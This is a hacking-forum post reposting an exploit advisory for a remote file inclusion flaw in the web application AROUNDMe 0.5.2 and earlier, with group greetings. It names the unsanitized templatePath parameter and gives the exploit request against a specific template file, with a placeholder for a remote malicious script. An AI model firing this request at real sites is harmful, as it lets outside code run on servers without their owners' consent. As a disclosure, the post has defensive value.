Jump to content
Guest Nemessis

[RST] AROUNDMe <= 0.5.2 [templatePath] RFI

By Guest Nemessis, in Proiecte RST

Recommended Posts

Guest Nemessis

Guest Nemessis

Posted
Posted

http://www.milw0rm.com/exploits/2562

---------------------------------------------------------------------------

AROUNDMe <= 0.5.2 [templatePath] Remote File Include Vulnerability

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : AROUNDMe

version : 0.5.2

Download: http://savannah.gnu.org/download/aroundme/aroundme_0_5_2.tar.tgz

------------------------------------------------------------------

Exploit:

~~~~~~~~

Variable $templatePath not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/template/barnraiser_01/p_new_password.tpl.php?templatePath=[Evil_Script]

---------------------------------------------------------------------------

Shoutz:

~~~~~~~

# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...